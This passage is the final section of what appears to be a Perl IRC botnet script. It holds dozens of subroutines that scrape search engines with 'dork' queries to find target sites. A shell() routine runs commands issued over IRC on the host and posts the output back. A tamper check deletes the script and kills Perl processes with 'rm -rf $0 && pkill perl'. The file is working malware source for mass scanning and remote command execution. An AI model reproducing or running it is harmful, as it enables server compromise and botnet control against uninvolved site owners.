3059. if ($link!~ /google|interia/) {
3060. my @grep=links($link);
3061. push(@list,@grep);
3062. }
3063. }
3064. }
3065. return @list;
3066. }
3067.  
3068. sub snz() {
3069. my @list;
3070. my $key = $_[0];
3071. for (my $b=1; $b<=500; $b+=1) {
3072. my $search = ("http://searchnz.co.nz/search.aspx?q=".&key($key)."&gr=false&np=".$b);
3073. my $res = search_engine_query($search);
3074. while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
3075. my $link = $1;
3076. if ($link!~ /searchnz/){
3077. my @grep = links($link);
3078. push(@list,@grep);
3079. }
3080. }
3081. }
3082. return @list;
3083. }
3084.  
3085. sub yandex(){
3086. my @list;
3087. my $key = $_[0];
3088. for ($b=0; $b<=50; $b+=1){
3089. my $search=("http://yandex.ru/yandsearch?p=".$b."&text=".&key($key)."&lr=94");
3090. my $res= search_engine_query($search);
3091. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
3092. my $link = $1;
3093. if ($link!~ /yandex/ ){
3094. my @grep = links($link);
3095. push(@list,@grep);
3096. }
3097. }
3098. }
3099. return @list;
3100. }
3101.  
3102. sub joeant(){
3103. my @list;
3104. my $key = $_[0];
3105. for ($b=0; $b<=50; $b+=10){
3106. my $search=("http://www.joeant.com/DIR/search.php?keywords=".&key($key)."&page=".$b."&limit=10");
3107. my $res= search_engine_query($search);
3108. while ($res =~ m/<a href=\http:\/\/(.*?)\//g) {
3109. my $link = $1;
3110. if ($link!~ /joeant/ ){
3111. my @grep = links($link);
3112. push(@list,@grep);
3113. }
3114. }
3115. }
3116. return @list;
3117. }
3118.  
3119. sub terra(){
3120. my @list;
3121. my $key = $_[0];
3122. for ($b=0; $b<=50; $b+=10){
3123. my $search=("http://buscador.terra.com/Results.aspx?ca=a&source=Search&query=".$key);
3124. my $res= search_engine_query($search);
3125. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
3126. my $link = $1;
3127. if ($link!~ /terra/ ){
3128. my @grep = links($link);
3129. push(@list,@grep);
3130. }
3131. }
3132. }
3133. return @list;
3134. }
3135.  
3136. sub youdao() {
3137. my @list;
3138. my $key = $_[0]; {
3139. my $search = ("http://www.youdao.com/search?q=".&key($key)."&start=10&ue=utf8&keyfrom=".$b."&lq=".&key($key)."&timesort=0");
3140. my $res = search_engine_query($search);
3141. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
3142. if ($1 !~ /youdao/){
3143. my $link = $1;
3144. my @grep = &links($link);
3145. push(@list,@grep);
3146. }
3147. }
3148. }
3149. return @list;
3150. }
3151.  
3152. sub amfibi() {
3153. my @list;
3154. my $key = $_[0]; {
3155. my $search = ("http://www.amfibi.com/search?query=".&key($key)."&start=".$b);
3156. my $res = search_engine_query($search);
3157. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
3158. if ($1 !~ /amfibi|cache/){
3159. my $link = $1;
3160. my @grep = &links($link);
3161. push(@list,@grep);
3162. }
3163. }
3164. }
3165. return @list;
3166. }
3167.  
3168. sub bigclique() {
3169. my @list;
3170. my $key = $_[0];
3171. for ($b=1; $b<=200; $b+=10) {
3172. $num += $num;
3173. my $search = ("http://www.bigclique.com/search.jsp?query=".&key($key)."&hitsPerPage=10&start=".$num."&hitsPerSite=".$b);
3174. my $res = search_engine_query($search);
3175. while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
3176. if ($1 !~ /bigclique|cached/){
3177. my $link = $1;
3178. my @grep = &links($link);
3179. push(@list,@grep);
3180. }
3181. }
3182. }
3183. return @list;
3184. }
3185.  
3186. sub dancefloor() {
3187. my @list;
3188. my $key = $_[0];
3189. for ($b=1; $b<=200; $b+=10) {
3190. $num += $num;
3191. my $search = ("http://www.dancefloorhireuk.co.uk/events/search.php?query=".&key($key)."&start=".$b."&search=1&results=10&type=and&domain=");
3192. my $res = search_engine_query($search);
3193. while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
3194. if ($1 !~ /dancefloor|query/){
3195. my $link = $1;
3196. my @grep = &links($link);
3197. push(@list,@grep);
3198. }
3199. }
3200. }
3201. return @list;
3202. }
3203.  
3204. sub live {
3205. my $key = $_[0];
3206. my @list;
3207. my $num = 50; my $max = 2000; my $p;
3208. my $search = "http://search.live.com/results.aspx?q=".&key($key)."&go";
3209. my $msearch = "http://search.live.com";
3210. my $nxsearch;
3211. my $res = search_engine_query($search);
3212. if ( $res =~ /<a class=\"sb_pagN\" href=\"(.*?)\" onmousedown/ ) {
3213. my $nxsearch = $1;
3214. }
3215. while ( $res =~ m/<h3><a href=\"http:\/\/(.*?)\"/g ) {
3216. my $l = $1 ; if ($l !~ /google/) { push (@list, $l); }
3217. }
3218. for ( $p=0;$p<=$max;$p += $num ) {
3219. $nxsearch = $msearch.htmltosearch($1)."&go";
3220. $res = search_engine_query("http://search.live.com/results.aspx?q=".&key($key)."&first=".$p."&FORM=PORE");
3221. while ( $res =~ m/<h3><a href=\"http:\/\/(.*?)\"/g ) {
3222. my $l = $1 ; if ($l !~ /google/) { push (@list, $l); }
3223. }
3224. }
3225. return @list;
3226. }
3227.  
3228. sub rakuten() {
3229. my @list;
3230. my $key = $_[0];
3231. for ($b=1; $b<=200; $b+=10) {
3232. my $search = ("http://websearch.rakuten.co.jp/Web?qt=".&key($key)."&col=OW&lg=all&st=".$b."&svx=101722");
3233. my $res = search_engine_query($search);
3234. while ($res =~ m/<a class="sc_result result" href=\"http:\/\/(.+?)\"/g) {
3235. if ($1 !~ /rakuten/){
3236. my $link = $1;
3237. my @grep = &links($link);
3238. push(@list,@grep);
3239. }
3240. }
3241. }
3242. return @list;
3243. }
3244.  
3245. sub biglobe {
3246. my $key = $_[0];
3247. my @list;
3248. for ($b=1; $b<=200; $b+=10) {
3249. $num += $num;
3250. my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search_bl_top?start=".$b."&ie=utf8&num=".$num."&q=".&key($key)."&lr=all";
3251. my $res = search_engine_query($search);
3252. while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
3253. if ($1 !~ /biglobe/){
3254. my $link = $1;
3255. my @grep = &links($link);
3256. push(@list,@grep);
3257. }
3258. }
3259. }
3260. return @list;
3261. }
3262.  
3263. sub nova() {
3264. my @list;
3265. my $key = $_[0];
3266. for ($b=1; $b<=200; $b+=10) {
3267. $num += $num;
3268. my $search = ("http://nova.rambler.ru/srch?query=".&key($key)."&page=".$b."&start=".$num);
3269. my $res = search_engine_query($search);
3270. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
3271. if ($1 !~ /rambler|cache/){
3272. my $link = $1;
3273. my @grep = &links($link);
3274. push(@list,@grep);
3275. }
3276. }
3277. }
3278. return @list;
3279. }
3280.  
3281. sub najdi() {
3282. my @list;
3283. my $key = $_[0];
3284. for ($b=1; $b<=200; $b+=10) {
3285. $num += $num;
3286. my $search = ("http://www.najdi.si/search.jsp?q=".&key($key)."&o=".$b."&maxHitsPerGroup=".$num);
3287. my $res = search_engine_query($search);
3288. while ($res =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) {
3289. if ($1 !~ /najdi|cache/){
3290. my $link = $1;
3291. my @grep = &links($link);
3292. push(@list,@grep);
3293. }
3294. }
3295. }
3296. return @list;
3297. }
3298.  
3299. sub goo() {
3300. my @list;
3301. my $key = $_[0];
3302. for ($b=1; $b<=200; $b+=10) {
3303. my $search = ("http://search.goo.ne.jp/web.jsp?STYPE=web&OE=UTF-8&MT=".&key($key)."&IE=UTF-8&FR=".$b."&from=pager");
3304. my $res = search_engine_query($search);
3305. while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
3306. if ($1 !~ /goo/){
3307. my $link = $1;
3308. my @grep = &links($link);
3309. push(@list,@grep);
3310. }
3311. }
3312. }
3313. return @list;
3314. }
3315.  
3316. sub uksubmit() {
3317. my @list;
3318. my $key = $_[0];
3319. for ($b=1; $b<=200; $b+=10) {
3320. my $search = ("http://www.uksubmit.co.uk/index.php?query=".&key($key)."&searchType=Web&page=".$b);
3321. my $res = search_engine_query($search);
3322. while ($res =~ m/<a href="http:\/\/(.+?)\"/g) {
3323. if ($1 !~ /uksubmit/){
3324. my $link = $1;
3325. my @grep = &links($link);
3326. push(@list,@grep);
3327. }
3328. }
3329. }
3330. return @list;
3331. }
3332.  
3333. sub excite() {
3334. my @list;
3335. my $key = $_[0];
3336. for ($b=1; $b<=200; $b+=10) {
3337. $num += $num;
3338. my $search = ("http://msxml.excite.com/excite/ws/results/Web/".$key."/".$b."/0/0/Relevance/zoom=off/qi=".$num."/qk=20/bepersistence=true/_iceUrlFlag=7? _IceUrl=true");
3339. my $res = search_engine_query($search);
3340. while ($res =~ m/status='http:\/\/(.*?)';/g) {
3341. if ($1 !~ /excite|google|Yahoo/){
3342. my $link = $1;
3343. my @grep = &links($link);
3344. push(@list,@grep);
3345. }
3346. }
3347. }
3348. return @list;
3349. }
3350.  
3351. sub mamma(){
3352. my @list;
3353. my $key = $_[0];
3354. for($b=0;$b<=1000;$b+=100){
3355. my $Th=("http://www.mamma.com/result.php?q=".key($key)."&type=web&p=".$b);
3356. my $Res=&search_engine_query($Th);
3357. while($Res =~ m/target=\"_blank\">(.+?)\//g){
3358. if ($1 !~ /msn|live|google|yahoo/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
3359. }
3360. }
3361. }
3362. return @list;
3363. }
3364.  
3365. #########################################
3366.  
3367. sub clean() {
3368. my @cln = ();
3369. my %visit = ();
3370. foreach my $element (@_) {
3371. $element =~ s/\/+/\//g;
3372. next if $visit{$element}++;
3373. push @cln, $element;
3374. }
3375. return @cln;
3376. }
3377.  
3378. sub key() {
3379. my $dork = $_[0];
3380. $dork =~ s/ /\+/g;
3381. $dork =~ s/:/\%3A/g;
3382. $dork =~ s/\//\%2F/g;
3383. $dork =~ s/\?/\%3F/g;
3384. $dork =~ s/&/\%26/g;
3385. $dork =~ s/\"/\%22/g;
3386. $dork =~ s/,/\%2C/g;
3387. $dork =~ s/\\/\%5C/g;
3388. $dork =~ s/@/\%40/g;
3389. $dork =~ s/\[/\%5B/g;
3390. $dork =~ s/\]/\%5D/g;
3391. $dork =~ s/\?/\%3F/g;
3392. $dork =~ s/\=/\%3D/g;
3393. $dork =~ s/\|/\%7C/g;
3394. return $dork;
3395. }
3396.  
3397. sub links() {
3398. my @list;
3399. my $link = $_[0];
3400. my $host = $_[0];
3401. my $hdir = $_[0];
3402. $hdir =~ s/(.*)\/[^\/]*$/$1/;
3403. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
3404. $host .= "/";
3405. $link .= "/";
3406. $hdir .= "/";
3407. $host =~ s/\/\//\//g;
3408. $hdir =~ s/\/\//\//g;
3409. $link =~ s/\/\//\//g;
3410. push(@list,$link,$host,$hdir);
3411. return @list;
3412. }
3413.  
3414. sub search_engine_query($) {
3415. my $url = $_[0];
3416. $url =~ s/http:\/\///;
3417. my $host = $url;
3418. my $query = $url;
3419. my $page = "";
3420. $host =~ s/href=\"?http:\/\///;
3421. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
3422. $query =~ s/$host//;
3423. if ($query eq "") { $query = "/"; }
3424. eval {
3425. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
3426. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
3427. my @pages = <$sock>;
3428. $page = "@pages";
3429. close($sock);
3430. };
3431. return $page;
3432. }
3433.  
3434. #########################################
3435.  
3436. sub shell() {
3437. my $path = $_[0];
3438. my $cmd = $_[1];
3439. if ($cmd =~ /cd (.*)/) {
3440. chdir("$1") || &msg("$path","4No such file or directory");
3441. return;
3442. }
3443. elsif ($pid = fork) { waitpid($pid, 0); }
3444. else { if (fork) { exit; } else {
3445. my @output = `$cmd 2>&1 3>&1`;
3446. my $c = 0;
3447. foreach my $output (@output) {
3448. $c++;
3449. chop $output;
3450. &msg("$path","$output");
3451. if ($c == 5) { $c = 0; sleep 2; }
3452. }
3453. exit;
3454. }}
3455. }
3456.  
3457. sub isAdmin() {
3458. my $status = 0;
3459. my $nick = $_[0];
3460. if ($nick eq $admin) { $status = 1; }
3461. return $status;
3462. }
3463.  
3464. sub msg() {
3465. return unless $#_ == 1;
3466. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
3467. }
3468.  
3469. sub SIGN() {
3470. if (($powered !~ /e/)||($mail !~ /tk/)) {
3471. print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
3472. exec("rm -rf $0 && pkill perl");
3473. }
3474. }
3475.  
3476. sub nick() {
3477. return unless $#_ == 0;
3478. sendraw("NICK $_[0]");
3479. }
3480.  
3481. sub notice() {
3482. return unless $#_ == 1;
3483. sendraw("NOTICE $_[0] :$_[1]");
3484. }